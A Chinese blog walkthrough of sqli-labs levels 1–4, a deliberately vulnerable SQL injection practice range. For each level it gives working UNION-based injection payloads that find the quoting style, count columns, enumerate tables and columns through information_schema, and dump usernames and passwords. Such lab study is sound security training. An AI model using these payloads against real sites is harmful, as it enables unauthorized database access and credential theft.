sqli-labs靶场学习(一)

最新推荐文章于 2024-06-07 07:48:16 发布
最新推荐文章于 2024-06-07 07:48:16 发布
阅读量893 收藏 19
点赞数 19
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dug123456_/article/details/137940528
版权

一.知识点

1.数据库

数据库是一个用于存储和管理数据的仓库。数据按照特定的格式存储,可以对数据库中的数据进行增加、修改、删除和查询操作。数据库的本质是一个文件系统,按照一定的逻辑结构组织数据,以方便高效地访问和维护。

2.数据库管理系统(DataBase Management System,DBMS)

数据库管理系统是一个操作和管理数据库的软件。它用于建立、使用和维护数据库,对数据库进行统一管理和控制,以保证数据库的安全性和完整性。用户通过数据库管理系统访问数据库中表内的数据。

3.基本步骤


1 、)寻找注入点
2 、)判断闭合方式
3 、)验证漏洞
4 、)判断列数及回显位
5 、)取数据
取数据库名
根据数据库名,取表名
根据数据库名、表名,取列名
取具体数据

二.sqli-labs

第一关

第一步判断是数字型还是字符型

输入?id=1'     //报错

输入?id=1' --+     //(--+为注释符)正常回显

所以sqli-labs-1为字符型注入

第二步判断其列数

用order by语句来查看有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。

试出来是到3的时候报错,所以列数为3

?id=1'order by 3 --+

第三步显示报错位

  ?id=-1' union select 1,2,3 --+

当union前面的语句为false,才会执行后面语句

发现哪些位置是可以显示的

第四步爆库名以及版本

?id=-1' union select 1,database(),version()--+

找到了库名:security

版本:5.5.53

第五步:爆表

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

information_schema.tables表示该数据库下的tables表,点(.)表示下一级。where后面是条件,group_concat()是将查询到结果连接起来。如果不用group_concat查询到的只有user。该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。

第六步爆列名

通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内容

第七步:查询字段

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

sqli-labs-2

第一步:判断是什么型

id=1--+

id=1‘--+显示报错 说明是数字型注入

接下来的步骤与sqli-labs一致,只是上一关是字符型注入这一题是数字型注入 payload如下

?id=1 --+
?id=1 order by 3--+
?id=-1 union select 1,2,3--+
?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1 union select 1,2,group_concat(username ,id , password) from users--+

sqli-labs-3

第一步:判断什么型

输入id=1’ 提示注意)

输入id=1‘)报错

输入id=1’)--+

所以我们推断单引号字符型且有括号

同样接下来与前两题步骤一样

?id=1')--+
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

sqli-labs-4

方法同上,根据页面报错信息得知sql语句是双引号字符型且有括号

与前几关步骤相同

?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

参考资料

http://t.csdnimg.cn/tiA6s

http://t.csdnimg.cn/LqSU9

http://t.csdnimg.cn/EAOse

vghkvc
关注
  • 19
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli——labs初学者通关详
weixin_54072578的博客
10-19 1万+
Page-1 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) 我们先用HackBar写入id=1 发现id可以显示, 然后在后面加入单引号查看是存在注入http://127.0.0.1/sqli/Less-1/?id=1' 发现结果出现报错,那么存在注入。 那么我们就可以用 order by语句逐步判断其表格有几列。最后我们发现表格有三列 http://127.0.0.1/sqli/Less-1/?id=1'.
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 1017
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
5-1sqli基本概念和原理讲解
山兔的博客
04-29 2163
Sql-Inject漏洞解析-课程目录  SQL Inject 漏洞原理概述  如何判断注入点类型及常见注入类型讲解  注入方式get&post的区别  SQL Inject漏洞手工测试:基于union联合查询的信息获取(select)  SQL Inject漏洞手工测试:基于报错的信息获取(select/delete/update/insert)  SQL Inject漏洞手工测试:操作系统权限获取  SQL注入漏洞-盲注(boolian base)原理及测试  SQL注入漏洞-盲
入门级SQL注入实战-sqli_labs
2302_76378481的博客
06-15 1163
ascii表的s值对应的是115,如果我们猜测到115的时候,and后面的值为真,前面的值也为真,就会出现 1 and 1的情况, 页面就会有提示信息。确定数据库的表是3列了,接下来使用union联合查询,查询当前数据库名,查询时讲前面的查询语句设为空,所以输入没有的值,111 union select 1,database(),3,后面代码逻辑第一行不显示,所以在第二个字段查询。大家好,这篇文章写的是一些入门级简单的sql注入,可以简单看一下,写了集中注入的手法,联合注入、报错注入、布尔盲注、延时盲注。
SQL注入:sqli第一关详细讲解
m0_50818626的博客
05-23 1236
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
sqli】sqli环境搭建以及sql注入常用的sql语句
SUSUYUA的博客
02-17 493
sqli环境配置以及有关sql注入基本语句
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
Sqli-Labs是一个专门针对SQL注入进行实战训练的靶场,分为多个级别,每个级别设计了不同的漏洞场景,旨在帮助用户理解和掌握SQL注入的检测和防护方法。“sqli-labs-master.zip”文件则包含了这个靶场的源代码和相关...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
sqli_libs通关教程
qq_48904485的博客
03-22 5298
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3802
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2809
sqli-labs靶场之前建议补一下基础。
sqli_lab
ing_end的博客
03-05 3492
读写文件 此状态不允许导入导出状态 修改限制成功 – (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 显示位: 这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
什么是SQL注入(SQLi)
Tybyqi的博客
11-29 2733
什么是SQL注入? SQL注入(SQLi)通常被认为是一种注入攻击,其中攻击者可以执行恶意SQL语句。它控制Web应用程序的数据库服务器。由于SQL注入无助可能会影响使用基于SQL数据库的任何站点或Web应用程序。弱点是最成熟,最普遍和最危险的Web应用程序漏洞之一。 通过使用SQL注入无助,在给定正确条件的情况下,攻击者可以使用它来回避Web应用程序的验证和批准组件并恢复整个数据库的实质内...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的...sqli-labs靶场提供了一个逐步提升SQL注入技能的平台,通过这些关卡的练习,学习者可以系统地理解和掌握SQL注入的各种技术,增强对数据库安全性的理解,提高安全防护意识。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值